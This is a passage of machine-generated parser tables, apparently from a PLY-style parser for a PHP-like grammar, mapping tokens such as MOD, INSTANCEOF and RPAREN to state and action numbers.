-322,-325,-326,-327,-328,-329,-330,-331,147,147,147,147,147,147,-348,-363,-227,-228,-349,-364,-428,147,147,-443,-443,-244,-248,-250,147,147,147,147,147,147,147,147,147,-297,-298,-299,-300,-301,-302,-303,-304,147,147,147,147,147,147,147,147,-313,-314,147,147,147,147,147,147,147,147,147,147,147,147,147,147,147,147,147,-183,-197,-188,-253,147,147,-345,147,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,147,147,-209,147,-429,585,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,147,-238,147,147,147,-353,147,-234,-229,-189,-443,-230,-252,147,147,-333,-336,-337,-346,-443,147,-361,147,147,-218,-235,-236,-240,-392,-393,585,-380,-390,585,-402,-249,147,147,147,-196,147,-191,-194,147,-205,-223,-210,-231,-232,-211,585,585,585,585,585,585,585,585,-411,-412,-413,-414,-415,-416,-417,-418,585,585,585,585,585,585,585,585,-427,-381,-391,-395,-365,-366,-386,-220,147,-231,-193,-232,147,147,-222,147,-212,-213,-214,-215,-394,585,-402,585,-246,-247,-195,-443,147,-224,-216,-217,585,147,-271,585,147,585,]),'MOD':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,148,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,148,-190,-429,-430,148,148,148,148,148,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,148,148,148,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,148,148,148,148,148,148,-348,-363,-227,-228,-349,-364,-428,148,148,-443,-443,-244,-248,-250,148,148,148,148,148,148,148,148,148,148,148,148,-300,-301,148,148,-304,148,148,148,148,148,148,148,148,-313,-314,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,-183,-197,-188,-253,148,148,-345,148,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,148,148,-209,148,-429,586,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,148,-238,148,148,148,-353,148,-234,-229,-189,-443,-230,-252,148,148,-333,-336,-337,-346,-443,148,-361,148,148,-218,-235,-236,-240,-392,-393,586,-380,-390,586,-402,-249,148,148,148,-196,148,-191,-194,148,-205,-223,-210,-231,-232,-211,586,586,586,586,586,586,586,586,586,586,586,-414,-415,586,586,-418,586,586,586,586,586,586,586,586,-427,-381,-391,-395,-365,-366,-386,-220,148,-231,-193,-232,148,148,-222,148,-212,-213,-214,-215,-394,586,-402,586,-246,-247,-195,-443,148,-224,-216,-217,586,148,-271,586,148,586,]),'IS_IDENTICAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,149,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,149,-190,-429,-430,149,149,149,149,149,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,149,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,149,149,149,149,149,149,-348,-363,-227,-228,-349,-364,-428,149,149,-443,-443,-244,-248,-250,149,149,149,149,149,149,149,149,149,-297,-298,-299,-300,-301,-302,-303,-304,None,None,None,None,-309,-310,-311,-312,-313,-314,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,-183,-197,-188,-253,149,149,-345,149,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,149,149,-209,149,-429,587,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,149,-238,149,149,149,-353,149,-234,-229,-189,-443,-230,-252,149,149,-333,-336,-337,-346,-443,149,-361,149,149,-218,-235,-236,-240,-392,-393,587,-380,-390,587,-402,-249,149,149,149,-196,149,-191,-194,149,-205,-223,-210,-231,-232,-211,587,587,587,587,587,587,587,587,-411,-412,-413,-414,-415,-416,-417,-418,None,None,None,None,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,149,-231,-193,-232,149,149,-222,149,-212,-213,-214,-215,-394,587,-402,587,-246,-247,-195,-443,149,-224,-216,-217,587,149,-271,587,149,587,]),'IS_NOT_IDENTICAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,150,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,150,-190,-429,-430,150,150,150,150,150,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,150,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,150,150,150,150,150,150,-348,-363,-227,-228,-349,-364,-428,150,150,-443,-443,-244,-248,-250,150,150,150,150,150,150,150,150,150,-297,-298,-299,-300,-301,-302,-303,-304,None,None,None,None,-309,-310,-311,-312,-313,-314,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,-183,-197,-188,-253,150,150,-345,150,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,150,150,-209,150,-429,588,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,150,-238,150,150,150,-353,150,-234,-229,-189,-443,-230,-252,150,150,-333,-336,-337,-346,-443,150,-361,150,150,-218,-235,-236,-240,-392,-393,588,-380,-390,588,-402,-249,150,150,150,-196,150,-191,-194,150,-205,-223,-210,-231,-232,-211,588,588,588,588,588,588,588,588,-411,-412,-413,-414,-415,-416,-417,-418,None,None,None,None,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,150,-231,-193,-232,150,150,-222,150,-212,-213,-214,-215,-394,588,-402,588,-246,-247,-195,-443,150,-224,-216,-217,588,150,-271,588,150,588,]),'IS_EQUAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,151,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,151,-190,-429,-430,151,151,151,151,151,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,151,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,151,151,151,151,151,151,-348,-363,-227,-228,-349,-364,-428,151,151,-443,-443,-244,-248,-250,151,151,151,151,151,151,151,151,151,-297,-298,-299,-300,-301,-302,-303,-304,None,None,None,None,-309,-310,-311,-312,-313,-314,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,-183,-197,-188,-253,151,151,-345,151,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,151,151,-209,151,-429,589,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,151,-238,151,151,151,-353,151,-234,-229,-189,-443,-230,-252,151,151,-333,-336,-337,-346,-443,151,-361,151,151,-218,-235,-236,-240,-392,-393,589,-380,-390,589,-402,-249,151,151,151,-196,151,-191,-194,151,-205,-223,-210,-231,-232,-211,589,589,589,589,589,589,589,589,-411,-412,-413,-414,-415,-416,-417,-418,None,None,None,None,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,151,-231,-193,-232,151,151,-222,151,-212,-213,-214,-215,-394,589,-402,589,-246,-247,-195,-443,151,-224,-216,-217,589,151,-271,589,151,589,]),'IS_NOT_EQUAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,152,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,152,-190,-429,-430,152,152,152,152,152,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,152,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,152,152,152,152,152,152,-348,-363,-227,-228,-349,-364,-428,152,152,-443,-443,-244,-248,-250,152,152,152,152,152,152,152,152,152,-297,-298,-299,-300,-301,-302,-303,-304,None,None,None,None,-309,-310,-311,-312,-313,-314,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,-183,-197,-188,-253,152,152,-345,152,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,152,152,-209,152,-429,590,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,152,-238,152,152,152,-353,152,-234,-229,-189,-443,-230,-252,152,152,-333,-336,-337,-346,-443,152,-361,152,152,-218,-235,-236,-240,-392,-393,590,-380,-390,590,-402,-249,152,152,152,-196,152,-191,-194,152,-205,-223,-210,-231,-232,-211,590,590,590,590,590,590,590,590,-411,-412,-413,-414,-415,-416,-417,-418,None,None,None,None,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,152,-231,-193,-232,152,152,-222,152,-212,-213,-214,-215,-394,590,-402,590,-246,-247,-195,-443,152,-224,-216,-217,590,152,-271,590,152,590,]),'IS_SMALLER':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,153,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,153,-190,-429,-430,153,153,153,153,153,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,153,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,153,153,153,153,153,153,-348,-363,-227,-228,-349,-364,-428,153,153,-443,-443,-244,-248,-250,153,153,153,153,153,153,153,153,153,-297,-298,-299,-300,-301,-302,-303,-304,153,153,153,153,None,None,None,None,-313,-314,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,-183,-197,-188,-253,153,153,-345,153,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,153,153,-209,153,-429,591,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,153,-238,153,153,153,-353,153,-234,-229,-189,-443,-230,-252,153,153,-333,-336,-337,-346,-443,153,-361,153,153,-218,-235,-236,-240,-392,-393,591,-380,-390,591,-402,-249,153,153,153,-196,153,-191,-194,153,-205,-223,-210,-231,-232,-211,591,591,591,591,591,591,591,591,-411,-412,-413,-414,-415,-416,-417,-418,591,591,591,591,None,None,None,None,-427,-381,-391,-395,-365,-366,-386,-220,153,-231,-193,-232,153,153,-222,153,-212,-213,-214,-215,-394,591,-402,591,-246,-247,-195,-443,153,-224,-216,-217,591,153,-271,591,153,591,]),'IS_SMALLER_OR_EQUAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,154,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,154,-190,-429,-430,154,154,154,154,154,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,154,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,154,154,154,154,154,154,-348,-363,-227,-228,-349,-364,-428,154,154,-443,-443,-244,-248,-250,154,154,154,154,154,154,154,154,154,-297,-298,-299,-300,-301,-302,-303,-304,154,154,154,154,None,None,None,None,-313,-314,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,-183,-197,-188,-253,154,154,-345,154,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,154,154,-209,154,-429,592,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,154,-238,154,154,154,-353,154,-234,-229,-189,-443,-230,-252,154,154,-333,-336,-337,-346,-443,154,-361,154,154,-218,-235,-236,-240,-392,-393,592,-380,-390,592,-402,-249,154,154,154,-196,154,-191,-194,154,-205,-223,-210,-231,-232,-211,592,592,592,592,592,592,592,592,-411,-412,-413,-414,-415,-416,-417,-418,592,592,592,592,None,None,None,None,-427,-381,-391,-395,-365,-366,-386,-220,154,-231,-193,-232,154,154,-222,154,-212,-213,-214,-215,-394,592,-402,592,-246,-247,-195,-443,154,-224,-216,-217,592,154,-271,592,154,592,]),'IS_GREATER':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,155,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,155,-190,-429,-430,155,155,155,155,155,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,155,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,155,155,155,155,155,155,-348,-363,-227,-228,-349,-364,-428,155,155,-443,-443,-244,-248,-250,155,155,155,155,155,155,155,155,155,-297,-298,-299,-300,-301,-302,-303,-304,155,155,155,155,None,None,None,None,-313,-314,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,-183,-197,-188,-253,155,155,-345,155,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,155,155,-209,155,-429,593,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,155,-238,155,155,155,-353,155,-234,-229,-189,-443,-230,-252,155,155,-333,-336,-337,-346,-443,155,-361,155,155,-218,-235,-236,-240,-392,-393,593,-380,-390,593,-402,-249,155,155,155,-196,155,-191,-194,155,-205,-223,-210,-231,-232,-211,593,593,593,593,593,593,593,593,-411,-412,-413,-414,-415,-416,-417,-418,593,593,593,593,None,None,None,None,-427,-381,-391,-395,-365,-366,-386,-220,155,-231,-193,-232,155,155,-222,155,-212,-213,-214,-215,-394,593,-402,593,-246,-247,-195,-443,155,-224,-216,-217,593,155,-271,593,155,593,]),'IS_GREATER_OR_EQUAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,156,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,156,-190,-429,-430,156,156,156,156,156,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,156,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,156,156,156,156,156,156,-348,-363,-227,-228,-349,-364,-428,156,156,-443,-443,-244,-248,-250,156,156,156,156,156,156,156,156,156,-297,-298,-299,-300,-301,-302,-303,-304,156,156,156,156,None,None,None,None,-313,-314,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,-183,-197,-188,-253,156,156,-345,156,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,156,156,-209,156,-429,594,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,156,-238,156,156,156,-353,156,-234,-229,-189,-443,-230,-252,156,156,-333,-336,-337,-346,-443,156,-361,156,156,-218,-235,-236,-240,-392,-393,594,-380,-390,594,-402,-249,156,156,156,-196,156,-191,-194,156,-205,-223,-210,-231,-232,-211,594,594,594,594,594,594,594,594,-411,-412,-413,-414,-415,-416,-417,-418,594,594,594,594,None,None,None,None,-427,-381,-391,-395,-365,-366,-386,-220,156,-231,-193,-232,156,156,-222,156,-212,-213,-214,-215,-394,594,-402,594,-246,-247,-195,-443,156,-224,-216,-217,594,156,-271,594,156,594,]),'INSTANCEOF':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,743,745,789,791,792,794,795,798,800,801,802,804,805,817,818,854,856,873,900,902,903,905,919,936,],[-362,157,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,157,-190,-429,-430,157,157,157,157,157,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,157,157,157,-317,157,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,157,157,157,157,157,157,-348,-363,-227,-228,-349,-364,-428,157,157,-443,-443,-244,-248,-250,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,-314,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,-183,-197,-188,-253,157,157,-345,157,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,157,157,-209,157,-184,-221,-243,-245,157,-238,157,157,157,-353,157,-234,-229,-189,-443,-230,-252,157,157,-333,-336,-337,-346,-443,157,-361,157,157,-218,-235,-236,-240,-249,157,157,157,-196,157,-191,-194,157,-205,-223,-210,-231,-232,-211,-220,157,-231,-193,-232,157,157,-222,157,-212,-213,-214,-215,-246,-247,-195,-443,157,-224,-216,-217,157,-271,157,]),'QUESTION':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,743,745,789,791,792,794,795,798,800,801,802,804,805,817,818,854,856,873,900,902,903,905,919,936,],[-362,158,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,158,-190,-429,-430,158,158,158,158,158,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,158,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,158,158,158,158,158,158,-348,-363,-227,-228,-349,-364,-428,158,158,-443,-443,-244,-248,-250,158,-289,-290,158,158,158,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,-183,-197,-188,-253,158,158,-345,158,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,158,158,-209,158,-184,-221,-243,-245,158,-238,-320,158,158,-353,-182,-234,-229,-189,-443,-230,-252,158,158,-333,-336,-337,-346,-443,158,-361,158,158,-218,-235,-236,-240,-249,-319,158,158,-196,158,-191,-194,158,-205,-223,-210,-231,-232,-211,-220,158,-231,-193,-232,158,158,-222,158,-212,-213,-214,-215,-246,-247,-195,-443,158,-224,-216,-217,158,-271,158,]),'RPAREN':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,108,109,111,116,117,119,187,203,204,206,207,208,209,212,213,214,216,217,218,220,221,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,251,252,253,259,265,269,271,273,278,279,280,281,282,283,299,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,337,340,341,342,344,357,358,359,362,365,374,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,397,398,399,400,401,402,403,404,405,406,412,413,414,415,416,417,418,419,425,426,427,428,430,431,433,434,436,437,444,445,447,448,452,454,458,459,461,462,463,464,467,478,479,480,481,482,484,486,504,505,506,507,508,511,524,525,526,527,529,530,531,533,535,536,538,539,544,546,547,548,549,555,556,557,55